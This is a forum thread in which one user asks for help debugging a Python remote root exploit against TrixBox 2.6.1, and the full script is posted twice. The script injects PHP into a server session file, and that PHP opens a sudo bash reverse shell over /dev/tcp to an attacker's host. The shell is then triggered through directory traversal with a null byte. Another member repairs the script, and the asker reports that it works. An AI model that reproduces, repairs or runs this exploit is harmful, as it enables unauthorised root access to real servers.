EvilZone

Programming and Scripting => Scripting Languages => : pl4f0rd July 13, 2011, 05:55:36 PM

: Python error - TypeError: cannot concatenate 'str' and 'NoneType' objects
: pl4f0rd July 13, 2011, 05:55:36 PM: Have error in below code and not sure why, Im guessing it has something to do with the def find_sessionid part.

Any help would be greatly appreciated

Error below

:
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00') TypeError: cannot concatenate 'str' and 'NoneType' objects

:
#!/usr/bin/python import sys from socket import * import re import os from time import sleep print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!\r\n" "[*] TrixBox 2.6.1 langChoice remote root exploit \r\n" "[*] http://www.offensive-security.com/0day/trixbox.py.txt\r\n") if (len(sys.argv)!=5): print "[*] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0] exit(0) host=sys.argv[1] port=int(sys.argv[2]) lhost=sys.argv[3] lport=int(sys.argv[4]) def create_post(injection): buffer=("POST /user/index.php HTTP/1.1 \r\n" "Host: 192.168.219.132 \r\n" "Content-Type: application/x-www-form-urlencoded \r\n" "Content-Length: "+str(len(injection))+"\r\n\r\n" +injection) return buffer def send_post(host,port,input): s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) s.send(input) output=s.recv(1024) s.close() return output def find_sessionid(http_output): headers=re.split("\n",http_output) for header in headers: if re.search("Set-Cookie",header): cook=header.split(" ") sessionid=cook[1][10:42] print "[*] Session ID is %s" % sessionid return sessionid print "[*] Injecting reverse shell into session file" bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>" reverse=create_post(bash_inject) raw_session=send_post(host,port,reverse) print "[*] Extracting Session ID" id=find_sessionid(raw_session) print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport) sleep(3) print "[*] Skadush! \r\n[*] Ctrl+C to exit reverse shell." tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00') send_post(host,port,tmpsession) print "[*] Cleaning up" cleanup=create_post('langChoice=english') send_post(host,port,cleanup) send_post(host,port,cleanup) print "[*] Done!" # milw0rm.com [2008-07-12]
: Re: Python error - TypeError: cannot concatenate 'str' and 'NoneType' objects
: Kulverstukas July 13, 2011, 07:20:03 PM: The error means that variable 'id' does not have a value, and in python everything is an object. So when a variable is created it turns into an object, and type 'None' is always returned even when nothing should be returned. So I'm guessing that 'id' does not receive a session ID in this line:
:
print "[*] Extracting Session ID" id=find_sessionid(raw_session)Therefore 'id' is None, and line:
:
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')tries to concat a string with an object 'None'.

Conclusion: exploit does not work because it does not receive the Session ID.
: Re: Python error - TypeError: cannot concatenate 'str' and 'NoneType' objects
: pl4f0rd July 14, 2011, 04:14:30 PM: So you got any ideas on how I can get the session?
: Re: Python error - TypeError: cannot concatenate 'str' and 'NoneType' objects
: Kulverstukas July 14, 2011, 05:24:12 PM: Try it on other versions...?
: Re: Python error - TypeError: cannot concatenate 'str' and 'NoneType' objects
: pl4f0rd July 14, 2011, 06:30:29 PM: Well it's deffo running the right version, see screenshot so must be a way to get this code to work some how
: Re: Python error - TypeError: cannot concatenate 'str' and 'NoneType' objects
: 10n1z3d July 14, 2011, 08:18:38 PM: The indentation on that line looks fucked up. Try this one:

:
#!/usr/bin/python import sys from socket import * import re import os from time import sleep print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!\r\n" "[*] TrixBox 2.6.1 langChoice remote root exploit \r\n" "[*] http://www.offensive-security.com/0day/trixbox.py.txt\r\n") if (len(sys.argv)!=5): print "[*] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0] exit(0) host=sys.argv[1] port=int(sys.argv[2]) lhost=sys.argv[3] lport=int(sys.argv[4]) def create_post(injection): buffer=("POST /user/index.php HTTP/1.1 \r\n" "Host: 192.168.219.132 \r\n" "Content-Type: application/x-www-form-urlencoded \r\n" "Content-Length: "+str(len(injection))+"\r\n\r\n" +injection) return buffer def send_post(host,port,input): s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) s.send(input) output=s.recv(1024) s.close() return output def find_sessionid(http_output): headers=re.split("\n",http_output) for header in headers: if re.search("Set-Cookie",header): cook=header.split(" ") sessionid=cook[1][10:42] print "[*] Session ID is %s" % sessionid return sessionid print "[*] Injecting reverse shell into session file" bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>" reverse=create_post(bash_inject) raw_session=send_post(host,port,reverse) print "[*] Extracting Session ID" id=find_sessionid(raw_session) print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport) sleep(3) print "[*] Skadush! \r\n[*] Ctrl+C to exit reverse shell." tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00') send_post(host,port,tmpsession) print "[*] Cleaning up" cleanup=create_post('langChoice=english') send_post(host,port,cleanup) #send_post(host,port,cleanup) # sending same shit twice? doesnt look right. GTFO! print "[*] Done!"
I have also commented out line 64 which seems useless to me.
: Re: Python error - TypeError: cannot concatenate 'str' and 'NoneType' objects
: pl4f0rd July 14, 2011, 09:03:20 PM: Great ;D

Works like a charm

Thanks